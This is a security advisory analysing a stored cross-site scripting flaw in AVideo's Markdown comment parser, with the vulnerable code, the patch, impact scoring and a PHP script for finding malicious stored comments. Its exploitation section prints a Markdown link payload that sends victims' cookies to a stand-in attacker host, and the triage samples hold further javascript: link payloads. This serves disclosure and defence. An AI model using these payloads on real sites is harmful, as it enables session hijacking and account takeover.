CVEReports

CVE-2026-33500: Stored Cross-Site Scripting via Markdown Parsing Bypass in WWBN AVideo

Alon Barad
Software Engineer

Mar 23, 2026 · 6 min read

Executive Summary (TL;DR)

An incomplete fix in AVideo <= 26.0 allows authenticated attackers to execute arbitrary JavaScript in a victim's browser by injecting `javascript:` URIs into Markdown links within video comments.

WWBN AVideo versions up to and including 26.0 contain a stored Cross-Site Scripting (XSS) vulnerability. The application utilizes a custom Markdown parsing class that intentionally disables built-in security features, allowing authenticated attackers to inject malicious JavaScript via formatted links. This flaw bypasses previous sanitization efforts introduced to remediate CVE-2026-27568.

Vulnerability Overview

WWBN AVideo, formerly known as YouPHPTube, is an open-source video platform that allows users to upload, share, and comment on video content. The application supports Markdown formatting within user comments, processed by the PHP Parsedown library. A vulnerability exists in how the platform customizes this Markdown parsing implementation.

The vulnerability is classified as Stored Cross-Site Scripting (CWE-79). It specifically affects the markDownToHTML() function located in objects/functionsSecurity.php. This function processes user-supplied text before rendering it as HTML in the browser. The core issue involves a security bypass where Markdown-native link syntax is not properly sanitized against malicious URI schemes.

This flaw represents an incomplete remediation of a prior vulnerability, identified as CVE-2026-27568. In attempting to allow specific safe HTML tags while stripping dangerous ones, developers disabled the upstream library's core security mechanisms. This architectural choice left native Markdown syntax handlers exposed to injection attacks.

An authenticated attacker can exploit this vulnerability by submitting a comment containing a crafted Markdown link. When a victim views the affected comment, the application renders an HTML anchor tag with a javascript: URI, resulting in arbitrary JavaScript execution within the context of the victim's session.

Root Cause Analysis

The root cause of CVE-2026-33500 is the explicit disabling of the Parsedown library's safeMode combined with incomplete override implementations in a custom subclass. The developers introduced a custom class named ParsedownSafeWithLinks to handle specific HTML tag sanitization.

During the processing of text in objects/functionsSecurity.php, the application instantiates the custom parser and explicitly calls $parsedown->setSafeMode(false). By disabling safeMode, the application opts out of Parsedown's native security features, specifically the filterUnsafeUrlInAttribute() method. This upstream method is responsible for blocking dangerous URI schemes like javascript: and vbscript:.

The custom ParsedownSafeWithLinks class successfully sanitizes raw HTML tags (e.g., <a href="...">) by overriding the inlineMarkup() method and passing the content through a custom sanitizeATag() function. However, the developers failed to override the inlineLink() method, which handles the native Markdown link syntax [text](url).

When a user submits Markdown link syntax, the text bypasses the inlineMarkup() sanitization entirely. It routes through the default inlineLink() method. Because safeMode is disabled, the resulting URL is not checked for dangerous schemes, allowing the application to output unsanitized user input directly into the href attribute of an anchor tag.

Code Analysis

An examination of the vulnerable code in objects/functionsSecurity.php demonstrates the misconfiguration of the Markdown parser. The function markDownToHTML instantiates the custom parser and configures its state before processing user input.

function markDownToHTML($text) {
    $parsedown = new ParsedownSafeWithLinks();
    $parsedown->setSafeMode(false);      // Vulnerable configuration: disables filterUnsafeUrlInAttribute()
    $parsedown->setMarkupEscaped(false); // Raw HTML is passed to inlineMarkup() / sanitizeATag() instead of being escaped
    $html = $parsedown->text($text);     // Markdown links [text](url) go through the un-overridden inlineLink()
    return $html;
}

The configuration $parsedown->setSafeMode(false) removes the built-in URI filtering. Without an override for the inlineLink() method in ParsedownSafeWithLinks, any javascript: URI passed via standard Markdown syntax remains intact in the final HTML output.

The official patch addresses this by adding an overridden inlineLink() method to the ParsedownSafeWithLinks class. This override intercepts the parsed link object and applies a strict regular expression whitelist to the href attribute.

protected function inlineLink($Excerpt)
{
    $Link = parent::inlineLink($Excerpt);
    if ($Link === null) {
        return null;
    }
    $href = isset($Link['element']['attributes']['href']) ? $Link['element']['attributes']['href'] : '';
    
    // Whitelist: http(s), mailto, relative paths, page anchors.
    if ($href !== '' && !preg_match('/^(https?:\/\/|mailto:|\/|#)/i', $href)) {
        $Link['element']['attributes']['href'] = ''; // Neutralize dangerous URI
    }
    return $Link;
}

This patch ensures that even with safeMode disabled globally, the specific code path responsible for handling Markdown links enforces a strict allowlist. It nullifies the href attribute if the scheme is not explicitly permitted.

Exploitation Methodology

Exploitation of CVE-2026-33500 requires the attacker to possess an active session on the target AVideo instance with permissions to submit comments. The attacker must target a video or page where comments are publicly visible or visible to administrative users.

The attacker crafts a comment containing a standard Markdown link structure. Instead of supplying a valid HTTP URL, the attacker provides a javascript: URI payload. The payload structure is [Clickable Text](javascript:malicious_code_here).

[See related video](javascript:fetch('https://attacker.example/log?c='+document.cookie))

The application stores this comment in the database without sanitizing the URI. When a victim navigates to the video page, the application retrieves the comment, processes it through markDownToHTML(), and renders the HTML to the victim's browser.

The attack concludes when the victim interacts with the rendered link. The browser executes the JavaScript payload within the security context of the AVideo application. The execution relies on user interaction (UI:R), as the victim must click the injected link.

Impact Assessment

The concrete security impact of CVE-2026-33500 is the ability for an attacker to execute arbitrary JavaScript in the context of other users' sessions. This classification corresponds to a CVSS 3.1 base score of 5.4 (Medium), with the vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N.

Successful exploitation allows the attacker to access sensitive session identifiers, such as cookies or local storage tokens, provided they are not protected by the HttpOnly flag. The attacker can exfiltrate these tokens to a controlled server, facilitating complete session hijacking and account takeover.

Beyond session hijacking, the attacker can force the victim's browser to perform unauthorized actions on the platform. If the victim is an administrative user, the payload can trigger administrative endpoints to alter site configurations, elevate privileges of attacker-controlled accounts, or modify system content.

The impact is constrained by the requirement for user interaction. The payload does not execute automatically upon page load; it strictly requires the victim to click the malicious hyperlink. Additionally, the attacker must hold a valid, authenticated session to inject the payload initially.

Remediation Guidance

The vendor has addressed this vulnerability in WWBN AVideo versions greater than 26.0. System administrators must update their instances to the latest available release. The fix is explicitly tracked in commit 3ae02fa240939dbefc5949d64f05790fd25d728d.

Organizations unable to apply the patch immediately should restrict commenting privileges to trusted users. Disabling comments entirely serves as a temporary workaround that completely mitigates the attack vector. Administrators should monitor the database for existing malicious payloads by searching the comments table for the string javascript:.
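As an added example (not AVideo's code), the following PHP triage script applies the same allowlist that the official patch enforces in inlineLink() to every Markdown link found in stored comment bodies, which catches case variants and other non-allowlisted schemes that a plain "javascript:" substring search would miss. The link-matching regex is a simplified assumption (one level of parentheses in the destination, no reference-style [text][label] links), and the sample rows are constructed.

```php
<?php
// Added example, not part of AVideo: triage stored comments against the
// allowlist the patched ParsedownSafeWithLinks::inlineLink() applies.

// Same allowlist regex as the patched inlineLink(): http(s), mailto, relative paths, anchors.
const ALLOWED_HREF = '/^(https?:\/\/|mailto:|\/|#)/i';

// Simplified Markdown inline-link matcher (assumption: at most one level of
// parentheses inside the destination, optional quoted title, no reference links).
const MD_LINK = '/\[([^\]]*)\]\(\s*((?:[^\s()]|\([^\s()]*\))+)(?:\s+["\'][^"\']*["\'])?\s*\)/';

/**
 * Return every Markdown link destination in $comment that the patched
 * allowlist would neutralize (i.e. that the vulnerable build rendered as-is).
 */
function findDisallowedLinks(string $comment): array
{
    $bad = [];
    if (preg_match_all(MD_LINK, $comment, $matches, PREG_SET_ORDER)) {
        foreach ($matches as $m) {
            $href = $m[2];
            if ($href !== '' && !preg_match(ALLOWED_HREF, $href)) {
                $bad[] = $href;
            }
        }
    }
    return $bad;
}

// Constructed sample rows standing in for the comments table.
$samples = [
    1 => '[See related video](javascript:alert(document.domain))',
    2 => '[Mixed case](JavaScript:alert(1))',   // a case-sensitive "javascript:" search misses this
    3 => '[Other scheme](vbscript:MsgBox(1))',   // not javascript:, still outside the allowlist
    4 => '[Safe](https://example.com/watch?v=1) and [anchor](#comments)',
    5 => '[Relative](/video/123) [mail](mailto:user@example.com)',
];

foreach ($samples as $id => $body) {
    $hits = findDisallowedLinks($body);
    printf("comment %d: %s\n", $id, $hits ? 'FLAG ' . implode(', ', $hits) : 'ok');
}
```

Raw HTML anchors (<a href="...">) are not covered here because, as described above, they already pass through sanitizeATag(); this script only targets the Markdown-native link path that the vulnerable build left unchecked.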

Developers maintaining custom forks of AVideo must ensure that the ParsedownSafeWithLinks class is correctly updated with the new inlineLink() override. Furthermore, security teams should implement a Web Application Firewall (WAF) rule to block incoming POST requests to comment submission endpoints if the payload body matches regex patterns indicative of Markdown javascript: URIs.

Official Patches

  • WWBN: Official fix commit implementing URI whitelist for inlineLink.
  • WWBN: GitHub Security Advisory for AVideo.

Technical Appendix

CVSS Score: 5.4 / 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Affected Systems

WWBN AVideo

Affected Versions Detail

  Product:           AVideo (WWBN)
  Affected Versions: <= 26.0
  Fixed Version:     Commit 3ae02fa240939dbefc5949d64f05790fd25d728d

  CWE ID:              CWE-79
  Attack Vector:       Network
  CVSS v3.1 Score:     5.4
  Privileges Required: Low (Authenticated)
  User Interaction:    Required
  Exploit Status:      Proof of Concept (PoC)
  CISA KEV:            Not Listed

MITRE ATT&CK Mapping

  • T1189 Drive-by Compromise (Initial Access)
  • T1185 Browser Session Hijacking (Collection)

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Known Exploits & Detection

Security Advisory: Proof of Concept demonstrating malicious javascript: URI injection.

Related Vulnerabilities
CVE-2026-27568

Attack Flow Diagram

(Interactive diagram; not reproduced in text.)
